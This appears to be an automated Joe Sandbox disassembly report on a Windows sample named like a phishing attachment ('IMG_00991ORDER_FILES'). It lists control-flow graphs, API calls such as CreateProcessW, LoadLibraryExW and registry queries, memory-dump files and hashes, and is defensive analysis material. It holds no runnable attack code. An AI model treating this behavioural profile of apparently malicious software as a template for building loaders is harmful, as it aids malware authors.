                                                                                    control_flow_graph 827 6f8a1817-6f8a1856 call 6f8a1bff 831 6f8a185c-6f8a1860 827->831 832 6f8a1976-6f8a1978 827->832 833 6f8a1869-6f8a1876 call 6f8a2480 831->833 834 6f8a1862-6f8a1868 call 6f8a243e 831->834 839 6f8a1878-6f8a187d 833->839 840 6f8a18a6-6f8a18ad 833->840 834->833 843 6f8a1898-6f8a189b 839->843 844 6f8a187f-6f8a1880 839->844 841 6f8a18af-6f8a18cb call 6f8a2655 call 6f8a1654 call 6f8a1312 GlobalFree 840->841 842 6f8a18cd-6f8a18d1 840->842 866 6f8a1925-6f8a1929 841->866 849 6f8a191e-6f8a1924 call 6f8a2655 842->849 850 6f8a18d3-6f8a191c call 6f8a1666 call 6f8a2655 842->850 843->840 845 6f8a189d-6f8a189e call 6f8a2e23 843->845 847 6f8a1888-6f8a1889 call 6f8a2b98 844->847 848 6f8a1882-6f8a1883 844->848 859 6f8a18a3 845->859 862 6f8a188e 847->862 854 6f8a1890-6f8a1896 call 6f8a2810 848->854 855 6f8a1885-6f8a1886 848->855 849->866 850->866 865 6f8a18a5 854->865 855->840 855->847 859->865 862->859 865->840 870 6f8a192b-6f8a1939 call 6f8a2618 866->870 871 6f8a1966-6f8a196d 866->871 877 6f8a193b-6f8a193e 870->877 878 6f8a1951-6f8a1958 870->878 871->832 873 6f8a196f-6f8a1970 GlobalFree 871->873 873->832 877->878 879 6f8a1940-6f8a1948 877->879 878->871 880 6f8a195a-6f8a1965 call 6f8a15dd 878->880 879->878 881 6f8a194a-6f8a194b FreeLibrary 879->881 880->871 881->878
                                                                                    APIs
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E74
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E79
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A18C5
                                                                                    • FreeLibrary.KERNEL32(?), ref: 6F8A194B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A1970
                                                                                      • Part of subcall function 6F8A243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F8A246F
                                                                                      • Part of subcall function 6F8A2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F8A1896,00000000), ref: 6F8A28E0
                                                                                      • Part of subcall function 6F8A1666: wsprintfW.USER32 ref: 6F8A1694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-3916222277
                                                                                    • Opcode ID: b64ff6e9418b0b03e38b99bbfb0b7335a56c44a52e8bcdec234d5c9611cd419b
                                                                                    • Instruction ID: 345f90430bb1b2dc2a4bfe943b0c21ce3bd9fb5d0974bb4ded0157732f5ff48e
                                                                                    • Opcode Fuzzy Hash: b64ff6e9418b0b03e38b99bbfb0b7335a56c44a52e8bcdec234d5c9611cd419b
                                                                                    • Instruction Fuzzy Hash: BF419371900B05ABDF149F78D888BD937A8FF05368F085CE6E9559E0C6DB7A9094CFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 884 406073-40607f 885 406080-4060b4 GetTickCount GetTempFileNameW 884->885 886 4060c3-4060c5 885->886 887 4060b6-4060b8 885->887 889 4060bd-4060c0 886->889 887->885 888 4060ba 887->888 888->889
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00406091
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-944333549
                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 890 406422-406454 call 4063c1 893 406492 890->893 894 406456-406484 RegQueryValueExW RegCloseKey 890->894 896 406496-406498 893->896 894->893 895 406486-40648a 894->895 895->896 897 40648c-406490 895->897 897->893 897->896
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
                                                                                    • RegCloseKey.KERNELBASE(?,?,?), ref: 00406473
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: Call
                                                                                    • API String ID: 3356406503-1824292864
                                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                    • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GlobalSize.KERNEL32(00000000), ref: 6F8A10AA
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6F8A10B9
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A10D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFreeSize
                                                                                    • String ID:
                                                                                    • API String ID: 465308736-0
                                                                                    • Opcode ID: 73c03701bedb6af2185297a33215f84d922e9af0b10222c69b67b8933fb72f39
                                                                                    • Instruction ID: bc606d419e235b593202b0e98779f535dab6be8d96a9a2b5660d86fa4e5e257b
                                                                                    • Opcode Fuzzy Hash: 73c03701bedb6af2185297a33215f84d922e9af0b10222c69b67b8933fb72f39
                                                                                    • Instruction Fuzzy Hash: 04019272504F0067CF10AFB9684494F37ACEF8972470049A6FA08CF281FF79D4608E95

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E74
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E79
                                                                                      • Part of subcall function 6F8A1BFF: GlobalFree.KERNEL32(?), ref: 6F8A1E7E
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 6F8A17DC
                                                                                      • Part of subcall function 6F8A1312: GlobalAlloc.KERNEL32(00000040,?,?,6F8A15FE,?), ref: 6F8A1328
                                                                                      • Part of subcall function 6F8A1312: lstrcpynW.KERNEL32(00000004,?,?,6F8A15FE,?), ref: 6F8A133E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$AllocCloseHandlelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 363591596-0
                                                                                    • Opcode ID: f3ca44da4e46b7dca501d64d61d612e826764a75840faf4c5ddee6cb0fe92e57
                                                                                    • Instruction ID: 280d2b03d46ee389cf96f3888201345faba571a81622aa9fd070c138229987f2
                                                                                    • Opcode Fuzzy Hash: f3ca44da4e46b7dca501d64d61d612e826764a75840faf4c5ddee6cb0fe92e57
                                                                                    • Instruction Fuzzy Hash: 6F016172508F40AACE109B7CD804B8E77E4EF46728F144DDAE5549E181DB6AA4908FA6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 948 401389-40138e 949 4013fa-4013fc 948->949 950 401390-4013a0 949->950 951 4013fe 949->951 950->951 953 4013a2-4013ad call 401434 950->953 952 401400-401401 951->952 956 401404-401409 953->956 957 4013af-4013b7 call 40136d 953->957 956->952 960 4013b9-4013bb 957->960 961 4013bd-4013c2 957->961 962 4013c4-4013c9 960->962 961->962 962->949 963 4013cb-4013f4 MulDiv SendMessageW 962->963 963->949
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                                                    • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                                                                    • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                                                    • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                                                                    • GetLastError.KERNEL32 ref: 00405AF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                                                                    • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                                                    • CloseHandle.KERNEL32(?), ref: 00405B6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3712363035-0
                                                                                    • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                                                    • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                                                                    • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                                                    • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                                                                      • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                                                      • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                                                                      • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405B16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
